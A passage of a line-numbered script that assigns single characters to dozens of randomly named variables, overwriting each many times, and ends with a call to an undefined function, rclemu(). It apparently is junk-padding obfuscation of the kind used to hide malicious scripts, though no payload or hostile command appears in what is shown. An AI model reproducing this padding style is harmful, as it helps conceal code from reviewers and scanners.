749 | iomrbii = "W"; | |
750 | iomrbii = "i"; | |
751 | iomrbii = "Z"; | |
752 | iomrbii = "x"; | |
753 | iomrbii = "y"; | |
754 | iomrbii = "K"; | |
755 | iomrbii = "y"; | |
756 | iomrbii = "J"; | |
757 | iomrbii = "j"; | |
758 | iomrbii = "P"; | |
759 | iomrbii = "q"; | |
760 | iomrbii = "z"; | |
761 | iomrbii = "c"; | |
762 | iomrbii = "A"; | |
763 | iomrbii = "q"; | |
764 | iomrbii = "L"; | |
765 | iomrbii = "R"; | |
766 | iomrbii = "x"; | |
767 | iomrbii = "S"; | |
768 | iomrbii = "K"; | |
769 | iomrbii = "K"; | |
770 | iomrbii = "f"; | |
771 | iomrbii = "M"; | |
772 | iomrbii = "h"; | |
773 | iomrbii = "2"; | |
774 | ghgvdj = "H"; | |
775 | ghgvdj = "D"; | |
776 | ghgvdj = "Q"; | |
777 | ghgvdj = "K"; | |
778 | ghgvdj = "P"; | |
779 | ghgvdj = "c"; | |
780 | ghgvdj = "v"; | |
781 | ghgvdj = "V"; | |
782 | ghgvdj = "f"; | |
783 | ghgvdj = "C"; | |
784 | ghgvdj = "y"; | |
785 | ghgvdj = "p"; | |
786 | ghgvdj = "d"; | |
787 | ghgvdj = "k"; | |
788 | ojxpd = "W"; | |
789 | ojxpd = "U"; | |
790 | ojxpd = "l"; | |
791 | ojxpd = "H"; | |
792 | ojxpd = "I"; | |
793 | ojxpd = "V"; | |
794 | ojxpd = "b"; | |
795 | ojxpd = "E"; | |
796 | ojxpd = "a"; | |
797 | ojxpd = "y"; | |
798 | ojxpd = "U"; | |
799 | ojxpd = "e"; | |
800 | ojxpd = "G"; | |
801 | ojxpd = "F"; | |
802 | ojxpd = "g"; | |
803 | ojxpd = "e"; | |
804 | ojxpd = "o"; | |
805 | ojxpd = "S"; | |
806 | ojxpd = "a"; | |
807 | ojxpd = "M"; | |
808 | ojxpd = "R"; | |
809 | ojxpd = "c"; | |
810 | ojxpd = "J"; | |
811 | ojxpd = "I"; | |
812 | ojxpd = "d"; | |
813 | ojxpd = "y"; | |
814 | ojxpd = "p"; | |
815 | ojxpd = "d"; | |
816 | ojxpd = "s"; | |
817 | ojxpd = "t"; | |
818 | ojxpd = "u"; | |
819 | ojxpd = "&"; | |
820 | ooppg = "P"; | |
821 | ooppg = "h"; | |
822 | ooppg = "A"; | |
823 | ooppg = "H"; | |
824 | ooppg = "F"; | |
825 | ooppg = "m"; | |
826 | ooppg = "s"; | |
827 | ooppg = "u"; | |
828 | ooppg = "T"; | |
829 | ooppg = "S"; | |
830 | ooppg = "u"; | |
831 | ooppg = "K"; | |
832 | ooppg = "y"; | |
833 | ooppg = "f"; | |
834 | ooppg = "D"; | |
835 | ooppg = "s"; | |
836 | ooppg = "e"; | |
837 | ooppg = "B"; | |
838 | ooppg = "M"; | |
839 | ooppg = "c"; | |
840 | ooppg = "W"; | |
841 | ooppg = "C"; | |
842 | ooppg = "m"; | |
843 | ooppg = "R"; | |
844 | ooppg = "g"; | |
845 | ooppg = "A"; | |
846 | ooppg = "J"; | |
847 | ooppg = "G"; | |
848 | ooppg = "a"; | |
849 | ooppg = "h"; | |
850 | ooppg = "P"; | |
851 | ooppg = "P"; | |
852 | ooppg = "b"; | |
853 | ooppg = "e"; | |
854 | ooppg = "O"; | |
855 | ooppg = "d"; | |
856 | ooppg = "J"; | |
857 | ooppg = "H"; | |
858 | ooppg = "c"; | |
859 | ooppg = "n"; | |
860 | ooppg = "y"; | |
861 | ooppg = "T"; | |
862 | ooppg = "a"; | |
863 | ooppg = "7"; | |
864 | yqljizt = "l"; | |
865 | yqljizt = "v"; | |
866 | yqljizt = "m"; | |
867 | yqljizt = "J"; | |
868 | yqljizt = "H"; | |
869 | yqljizt = "w"; | |
870 | yqljizt = "U"; | |
871 | yqljizt = "M"; | |
872 | yqljizt = "k"; | |
873 | yqljizt = "x"; | |
874 | yqljizt = "r"; | |
875 | yqljizt = "M"; | |
876 | yqljizt = "s"; | |
877 | yqljizt = "K"; | |
878 | yqljizt = "q"; | |
879 | yqljizt = "Q"; | |
880 | yqljizt = "F"; | |
881 | yqljizt = "e"; | |
882 | yqljizt = "Q"; | |
883 | yqljizt = "Q"; | |
884 | yqljizt = "X"; | |
885 | yqljizt = "z"; | |
886 | yqljizt = "T"; | |
887 | yqljizt = "G"; | |
888 | yqljizt = "J"; | |
889 | yqljizt = "j"; | |
890 | yqljizt = "b"; | |
891 | yqljizt = "M"; | |
892 | yqljizt = "E"; | |
893 | yqljizt = "-"; | |
894 | okuuepo = "K"; | |
895 | okuuepo = "Z"; | |
896 | okuuepo = "q"; | |
897 | okuuepo = "P"; | |
898 | okuuepo = "l"; | |
899 | okuuepo = "Z"; | |
900 | okuuepo = "l"; | |
901 | okuuepo = "j"; | |
902 | okuuepo = "A"; | |
903 | okuuepo = "b"; | |
904 | okuuepo = "W"; | |
905 | okuuepo = "x"; | |
906 | okuuepo = "n"; | |
907 | okuuepo = "H"; | |
908 | okuuepo = "K"; | |
909 | okuuepo = "W"; | |
910 | okuuepo = "G"; | |
911 | okuuepo = "s"; | |
912 | okuuepo = "k"; | |
913 | okuuepo = "n"; | |
914 | okuuepo = "c"; | |
915 | okuuepo = "Z"; | |
916 | okuuepo = "y"; | |
917 | okuuepo = "Q"; | |
918 | okuuepo = "z"; | |
919 | okuuepo = "C"; | |
920 | okuuepo = "R"; | |
921 | okuuepo = "x"; | |
922 | okuuepo = "k"; | |
923 | okuuepo = "e"; | |
924 | okuuepo = "b"; | |
925 | okuuepo = "t"; | |
926 | okuuepo = "N"; | |
927 | qyjirlizj = "v"; | |
928 | qyjirlizj = "F"; | |
929 | qyjirlizj = "H"; | |
930 | irqav = "E"; | |
931 | irqav = "t"; | |
932 | irqav = "O"; | |
933 | irqav = "Z"; | |
934 | irqav = "C"; | |
935 | irqav = "G"; | |
936 | irqav = "R"; | |
937 | irqav = "j"; | |
938 | irqav = "b"; | |
939 | irqav = "d"; | |
940 | irqav = "R"; | |
941 | irqav = "v"; | |
942 | irqav = "l"; | |
943 | irqav = "B"; | |
944 | irqav = "X"; | |
945 | irqav = "S"; | |
946 | irqav = "K"; | |
947 | irqav = "9"; | |
948 | vfcoazaij = "K"; | |
949 | vfcoazaij = "s"; | |
950 | vfcoazaij = "z"; | |
951 | vfcoazaij = "l"; | |
952 | vfcoazaij = "g"; | |
953 | vfcoazaij = "y"; | |
954 | vfcoazaij = "O"; | |
955 | vfcoazaij = "t"; | |
956 | vfcoazaij = "X"; | |
957 | vfcoazaij = "I"; | |
958 | vfcoazaij = "o"; | |
959 | vfcoazaij = "X"; | |
960 | vfcoazaij = "D"; | |
961 | vfcoazaij = "d"; | |
962 | vfcoazaij = "Y"; | |
963 | vfcoazaij = "q"; | |
964 | vfcoazaij = "J"; | |
965 | vfcoazaij = "o"; | |
966 | tinqi = "a"; | |
967 | tinqi = "M"; | |
968 | tinqi = "i"; | |
969 | tinqi = "W"; | |
970 | tinqi = "N"; | |
971 | tinqi = "v"; | |
972 | tinqi = "a"; | |
973 | tinqi = "h"; | |
974 | tinqi = "e"; | |
975 | tinqi = "G"; | |
976 | tinqi = "F"; | |
977 | tinqi = "S"; | |
978 | tinqi = "o"; | |
979 | tinqi = "G"; | |
980 | tinqi = "G"; | |
981 | tinqi = "r"; | |
982 | tinqi = "h"; | |
983 | tinqi = "V"; | |
984 | tinqi = "q"; | |
985 | tinqi = "x"; | |
986 | tinqi = "v"; | |
987 | tinqi = "r"; | |
988 | tinqi = "s"; | |
989 | tinqi = "K"; | |
990 | tinqi = "b"; | |
991 | tinqi = "M"; | |
992 | tinqi = "V"; | |
993 | tinqi = "p"; | |
994 | tinqi = "L"; | |
995 | tinqi = "d"; | |
996 | tinqi = "Q"; | |
997 | tinqi = "K"; | |
998 | tinqi = "G"; | |
999 | tinqi = "M"; | |
1000 | tinqi = "M"; | |
1001 | tinqi = "y"; | |
1002 | tinqi = "a"; | |
1003 | tinqi = "r"; | |
1004 | tinqi = "L"; | |
1005 | hqzgcoi = "v"; | |
1006 | hqzgcoi = "i"; | |
1007 | hqzgcoi = "q"; | |
1008 | hqzgcoi = "h"; | |
1009 | hqzgcoi = "K"; | |
1010 | hqzgcoi = "M"; | |
1011 | hqzgcoi = "C"; | |
1012 | hqzgcoi = "C"; | |
1013 | hqzgcoi = "J"; | |
1014 | hqzgcoi = "G"; | |
1015 | hqzgcoi = "a"; | |
1016 | hqzgcoi = "p"; | |
1017 | hqzgcoi = "u"; | |
1018 | hqzgcoi = "e"; | |
1019 | hqzgcoi = "m"; | |
1020 | hqzgcoi = "F"; | |
1021 | hqzgcoi = "d"; | |
1022 | hqzgcoi = "d"; | |
1023 | hqzgcoi = "W"; | |
1024 | hqzgcoi = "w"; | |
1025 | hqzgcoi = "Z"; | |
1026 | hqzgcoi = "n"; | |
1027 | hqzgcoi = "C"; | |
1028 | hqzgcoi = "h"; | |
1029 | hqzgcoi = "v"; | |
1030 | hqzgcoi = "z"; | |
1031 | hqzgcoi = "Q"; | |
1032 | hqzgcoi = "G"; | |
1033 | hqzgcoi = "O"; | |
1034 | hqzgcoi = "f"; | |
1035 | hqzgcoi = "X"; | |
1036 | hqzgcoi = "d"; | |
1037 | hqzgcoi = "H"; | |
1038 | hqzgcoi = "J"; | |
1039 | hqzgcoi = "R"; | |
1040 | hqzgcoi = "y"; | |
1041 | hqzgcoi = "m"; | |
1042 | hqzgcoi = "K"; | |
1043 | hqzgcoi = "s"; | |
1044 | hqzgcoi = "p"; | |
1045 | hqzgcoi = "P"; | |
1046 | hqzgcoi = "p"; | |
1047 | wjnqme = "Z"; | |
1048 | wjnqme = "a"; | |
1049 | wjnqme = "r"; | |
1050 | wjnqme = "n"; | |
1051 | wjnqme = "t"; | |
1052 | wjnqme = "q"; | |
1053 | wjnqme = "l"; | |
1054 | wjnqme = "8"; | |
1055 | dupnlnej = "Y"; | |
1056 | dupnlnej = "G"; | |
1057 | dupnlnej = "T"; | |
1058 | dupnlnej = "C"; | |
1059 | dupnlnej = "I"; | |
1060 | dupnlnej = "C"; | |
1061 | dupnlnej = "D"; | |
1062 | dupnlnej = "k"; | |
1063 | dupnlnej = "u"; | |
1064 | dupnlnej = "r"; | |
1065 | dupnlnej = "z"; | |
1066 | dupnlnej = "d"; | |
1067 | dupnlnej = "f"; | |
1068 | dupnlnej = "K"; | |
1069 | dupnlnej = "u"; | |
1070 | dupnlnej = "c"; | |
1071 | dupnlnej = "e"; | |
1072 | dupnlnej = "i"; | |
1073 | dupnlnej = "P"; | |
1074 | dupnlnej = "N"; | |
1075 | dupnlnej = "p"; | |
1076 | dupnlnej = "q"; | |
1077 | dupnlnej = "k"; | |
1078 | dupnlnej = "V"; | |
1079 | dupnlnej = "d"; | |
1080 | dupnlnej = "S"; | |
1081 | dupnlnej = "E"; | |
1082 | dupnlnej = "N"; | |
1083 | dupnlnej = "i"; | |
1084 | dupnlnej = "d"; | |
1085 | dupnlnej = "s"; | |
1086 | dupnlnej = "m"; | |
1087 | dupnlnej = "D"; | |
1088 | dupnlnej = "X"; | |
1089 | dupnlnej = "T"; | |
1090 | dupnlnej = "d"; | |
1091 | dupnlnej = "g"; | |
1092 | dupnlnej = "a"; | |
1093 | dupnlnej = "D"; | |
1094 | dupnlnej = "w"; | |
1095 | dupnlnej = "K"; | |
1096 | dupnlnej = "D"; | |
1097 | dupnlnej = "Y"; | |
1098 | dupnlnej = "Q"; | |
1099 | rifbngrp = "G"; | |
1100 | rifbngrp = "X"; | |
1101 | rifbngrp = "T"; | |
1102 | rifbngrp = "w"; | |
1103 | rifbngrp = "Z"; | |
1104 | rifbngrp = "n"; | |
1105 | rifbngrp = "J"; | |
1106 | rifbngrp = "j"; | |
1107 | rifbngrp = "c"; | |
1108 | rifbngrp = "V"; | |
1109 | rifbngrp = "q"; | |
1110 | rifbngrp = "z"; | |
1111 | rifbngrp = "h"; | |
1112 | rifbngrp = "Y"; | |
1113 | rifbngrp = "v"; | |
1114 | rifbngrp = "u"; | |
1115 | rifbngrp = "N"; | |
1116 | rifbngrp = "S"; | |
1117 | rifbngrp = "q"; | |
1118 | rifbngrp = "q"; | |
1119 | rifbngrp = "X"; | |
1120 | rifbngrp = "Y"; | |
1121 | rifbngrp = "L"; | |
1122 | rifbngrp = "W"; | |
1123 | rifbngrp = "o"; | |
1124 | rifbngrp = "N"; | |
1125 | rifbngrp = "T"; | |
1126 | rifbngrp = "I"; | |
1127 | rifbngrp = "F"; | |
1128 | rifbngrp = "p"; | |
1129 | rifbngrp = "r"; | |
1130 | rifbngrp = "e"; | |
1131 | rifbngrp = "A"; | |
1132 | rifbngrp = "A"; | |
1133 | rifbngrp = "j"; | |
1134 | rifbngrp = "W"; | |
1135 | pppyfegc = "f"; | |
1136 | pppyfegc = "t"; | |
1137 | pppyfegc = "C"; | |
1138 | pppyfegc = "f"; | |
1139 | pppyfegc = "C"; | |
1140 | pppyfegc = "h"; | |
1141 | pppyfegc = "Q"; | |
1142 | pppyfegc = "V"; | |
1143 | pppyfegc = "h"; | |
1144 | pppyfegc = "J"; | |
1145 | pppyfegc = "I"; | |
1146 | pppyfegc = "U"; | |
1147 | pppyfegc = "u"; | |
1148 | pppyfegc = "V"; | |
1149 | pppyfegc = "Y"; | |
1150 | pppyfegc = "w"; | |
1151 | pppyfegc = "s"; | |
1152 | pppyfegc = "T"; | |
1153 | pppyfegc = "z"; | |
1154 | pppyfegc = "A"; | |
1155 | pppyfegc = "L"; | |
1156 | pppyfegc = "S"; | |
1157 | pppyfegc = "O"; | |
1158 | pppyfegc = "X"; | |
1159 | pppyfegc = "g"; | |
1160 | pppyfegc = "B"; | |
1161 | pppyfegc = "4"; | |
1162 | ijbkjd = "U"; | |
1163 | ijbkjd = "B"; | |
1164 | ijbkjd = "H"; | |
1165 | ijbkjd = "h"; | |
1166 | ijbkjd = "i"; | |
1167 | ijbkjd = "i"; | |
1168 | ijbkjd = "W"; | |
1169 | ijbkjd = "U"; | |
1170 | ijbkjd = "Q"; | |
1171 | ijbkjd = "X"; | |
1172 | ijbkjd = "N"; | |
1173 | ijbkjd = "z"; | |
1174 | ijbkjd = "B"; | |
1175 | ijbkjd = " "; | |
1176 | kirricso = "g"; | |
1177 | kirricso = "F"; | |
1178 | kirricso = "Z"; | |
1179 | kirricso = "b"; | |
1180 | kirricso = "v"; | |
1181 | kirricso = "v"; | |
1182 | kirricso = "J"; | |
1183 | kirricso = "x"; | |
1184 | kirricso = "u"; | |
1185 | kirricso = "s"; | |
1186 | kirricso = "j"; | |
1187 | gfqxtjtd = "s"; | |
1188 | gfqxtjtd = "A"; | |
1189 | gfqxtjtd = "e"; | |
1190 | gfqxtjtd = "K"; | |
1191 | gfqxtjtd = "g"; | |
1192 | gfqxtjtd = "l"; | |
1193 | gfqxtjtd = "n"; | |
1194 | gfqxtjtd = "Z"; | |
1195 | gfqxtjtd = "u"; | |
1196 | ablmdinql = "p"; | |
1197 | ablmdinql = "U"; | |
1198 | ablmdinql = "i"; | |
1199 | ablmdinql = "y"; | |
1200 | ablmdinql = "H"; | |
1201 | ablmdinql = "A"; | |
1202 | ablmdinql = "B"; | |
1203 | ablmdinql = "V"; | |
1204 | ablmdinql = "C"; | |
1205 | ablmdinql = "H"; | |
1206 | ablmdinql = "l"; | |
1207 | ablmdinql = "v"; | |
1208 | ablmdinql = "Z"; | |
1209 | ablmdinql = "Y"; | |
1210 | ablmdinql = "T"; | |
1211 | ablmdinql = "D"; | |
1212 | ablmdinql = "V"; | |
1213 | ablmdinql = "B"; | |
1214 | ablmdinql = "H"; | |
1215 | ablmdinql = "z"; | |
1216 | ablmdinql = "q"; | |
1217 | ablmdinql = "h"; | |
1218 | ablmdinql = "D"; | |
1219 | ablmdinql = "t"; | |
1220 | ablmdinql = "U"; | |
1221 | urofouk = "G"; | |
1222 | urofouk = "U"; | |
1223 | urofouk = "t"; | |
1224 | urofouk = "K"; | |
1225 | urofouk = "J"; | |
1226 | urofouk = "w"; | |
1227 | urofouk = "w"; | |
1228 | urofouk = "Q"; | |
1229 | urofouk = "o"; | |
1230 | urofouk = "M"; | |
1231 | urofouk = "m"; | |
1232 | urofouk = "g"; | |
1233 | urofouk = "I"; | |
1234 | urofouk = "q"; | |
1235 | urofouk = "b"; | |
1236 | vzkimfm = "E"; | |
1237 | vzkimfm = "P"; | |
1238 | vzkimfm = "n"; | |
1239 | vzkimfm = "K"; | |
1240 | vzkimfm = "H"; | |
1241 | vzkimfm = "L"; | |
1242 | vzkimfm = "I"; | |
1243 | vzkimfm = "f"; | |
1244 | vzkimfm = "U"; | |
1245 | vzkimfm = "e"; | |
1246 | vzkimfm = "k"; | |
1247 | vzkimfm = "A"; | |
1248 | vzkimfm = "J"; | |
1249 | vzkimfm = "E"; | |
1250 | vzkimfm = "w"; | |
1251 | vzkimfm = "t"; | |
1252 | vzkimfm = "t"; | |
1253 | vzkimfm = "s"; | |
1254 | vzkimfm = "P"; | |
1255 | vzkimfm = "B"; | |
1256 | vzkimfm = "J"; | |
1257 | vzkimfm = "r"; | |
1258 | vzkimfm = "i"; | |
1259 | vzkimfm = "O"; | |
1260 | vzkimfm = "U"; | |
1261 | vzkimfm = "Q"; | |
1262 | vzkimfm = "E"; | |
1263 | vzkimfm = "c"; | |
1264 | vzkimfm = "Z"; | |
1265 | vzkimfm = "Y"; | |
1266 | vzkimfm = "q"; | |
1267 | vzkimfm = "x"; | |
1268 | rdjdngmdv = "d"; | |
1269 | rdjdngmdv = "f"; | |
1270 | rdjdngmdv = "N"; | |
1271 | rdjdngmdv = "i"; | |
1272 | rdjdngmdv = "R"; | |
1273 | rdjdngmdv = "U"; | |
1274 | rdjdngmdv = "b"; | |
1275 | rdjdngmdv = "w"; | |
1276 | rdjdngmdv = "i"; | |
1277 | rdjdngmdv = "P"; | |
1278 | rdjdngmdv = "f"; | |
1279 | rdjdngmdv = "Z"; | |
1280 | rdjdngmdv = "s"; | |
1281 | rdjdngmdv = "Z"; | |
1282 | rdjdngmdv = "J"; | |
1283 | rdjdngmdv = "O"; | |
1284 | rdjdngmdv = "M"; | |
1285 | rdjdngmdv = "T"; | |
1286 | rdjdngmdv = "E"; | |
1287 | rdjdngmdv = "N"; | |
1288 | rdjdngmdv = "Q"; | |
1289 | rdjdngmdv = "M"; | |
1290 | rdjdngmdv = "J"; | |
1291 | rdjdngmdv = "E"; | |
1292 | rdjdngmdv = "d"; | |
1293 | rdjdngmdv = "C"; | |
1294 | rdjdngmdv = "i"; | |
1295 | rdjdngmdv = "C"; | |
1296 | rdjdngmdv = "1"; | |
1297 | kvgwuw = "r"; | |
1298 | kvgwuw = "K"; | |
1299 | kvgwuw = "f"; | |
1300 | kvgwuw = "b"; | |
1301 | kvgwuw = "R"; | |
1302 | kvgwuw = "q"; | |
1303 | ksubt = "e"; | |
1304 | ksubt = "s"; | |
1305 | ksubt = "J"; | |
1306 | ksubt = "p"; | |
1307 | ksubt = "j"; | |
1308 | ksubt = "E"; | |
1309 | ksubt = "R"; | |
1310 | ksubt = "s"; | |
1311 | ksubt = "H"; | |
1312 | ksubt = "W"; | |
1313 | ksubt = "i"; | |
1314 | ksubt = "s"; | |
1315 | ksubt = "U"; | |
1316 | ksubt = "C"; | |
1317 | ksubt = "E"; | |
1318 | ksubt = "%"; | |
1319 | ibhirsrj = "k"; | |
1320 | ibhirsrj = "O"; | |
1321 | ibhirsrj = "T"; | |
1322 | ibhirsrj = "r"; | |
1323 | ibhirsrj = "N"; | |
1324 | ibhirsrj = "t"; | |
1325 | ibhirsrj = "X"; | |
1326 | ibhirsrj = "N"; | |
1327 | ibhirsrj = "f"; | |
1328 | ibhirsrj = "E"; | |
1329 | ibhirsrj = "V"; | |
1330 | ibhirsrj = "Y"; | |
1331 | ibhirsrj = "V"; | |
1332 | ibhirsrj = "E"; | |
1333 | ibhirsrj = "h"; | |
1334 | ibhirsrj = "t"; | |
1335 | ararikr = "A"; | |
1336 | ararikr = "c"; | |
1337 | ararikr = "w"; | |
1338 | ararikr = "P"; | |
1339 | ararikr = "x"; | |
1340 | ararikr = "g"; | |
1341 | ararikr = "M"; | |
1342 | ararikr = "A"; | |
1343 | ararikr = "e"; | |
1344 | cuubnpag = "G"; | |
1345 | cuubnpag = "M"; | |
1346 | cuubnpag = "H"; | |
1347 | cuubnpag = "y"; | |
1348 | cuubnpag = "H"; | |
1349 | cuubnpag = "n"; | |
1350 | cuubnpag = "F"; | |
1351 | cuubnpag = "v"; | |
1352 | cuubnpag = "b"; | |
1353 | cuubnpag = "F"; | |
1354 | cuubnpag = "S"; | |
1355 | cuubnpag = "G"; | |
1356 | cuubnpag = "a"; | |
1357 | cuubnpag = "q"; | |
1358 | cuubnpag = "M"; | |
1359 | cuubnpag = "c"; | |
1360 | cuubnpag = "n"; | |
1361 | cuubnpag = "K"; | |
1362 | cuubnpag = "j"; | |
1363 | cuubnpag = "y"; | |
1364 | cuubnpag = "N"; | |
1365 | cuubnpag = "G"; | |
1366 | cuubnpag = "M"; | |
1367 | cuubnpag = "u"; | |
1368 | cuubnpag = "V"; | |
1369 | cuubnpag = "T"; | |
1370 | cuubnpag = "z"; | |
1371 | cuubnpag = "Y"; | |
1372 | wfsljpfpa = "T"; | |
1373 | wfsljpfpa = "I"; | |
1374 | wfsljpfpa = "U"; | |
1375 | wfsljpfpa = "x"; | |
1376 | wfsljpfpa = "h"; | |
1377 | wfsljpfpa = "e"; | |
1378 | wfsljpfpa = "N"; | |
1379 | wfsljpfpa = "d"; | |
1380 | wfsljpfpa = "j"; | |
1381 | wfsljpfpa = "e"; | |
1382 | wfsljpfpa = "k"; | |
1383 | wfsljpfpa = "X"; | |
1384 | wfsljpfpa = "X"; | |
1385 | wfsljpfpa = "Z"; | |
1386 | wfsljpfpa = "P"; | |
1387 | wfsljpfpa = "E"; | |
1388 | wfsljpfpa = "I"; | |
1389 | ecfoyva = "T"; | |
1390 | ecfoyva = "t"; | |
1391 | ecfoyva = "Z"; | |
1392 | ecfoyva = "d"; | |
1393 | ecfoyva = "y"; | |
1394 | ecfoyva = "c"; | |
1395 | ecfoyva = "l"; | |
1396 | ecfoyva = "U"; | |
1397 | ecfoyva = "a"; | |
1398 | ecfoyva = "f"; | |
1399 | ecfoyva = "q"; | |
1400 | ecfoyva = "5"; | |
1401 | ivrljt = "u"; | |
1402 | ivrljt = "l"; | |
1403 | ivrljt = "v"; | |
1404 | ivrljt = "i"; | |
1405 | ivrljt = "I"; | |
1406 | ivrljt = "E"; | |
1407 | ivrljt = "r"; | |
1408 | ivrljt = "F"; | |
1409 | ivrljt = "C"; | |
1410 | rclemu ( ); |
|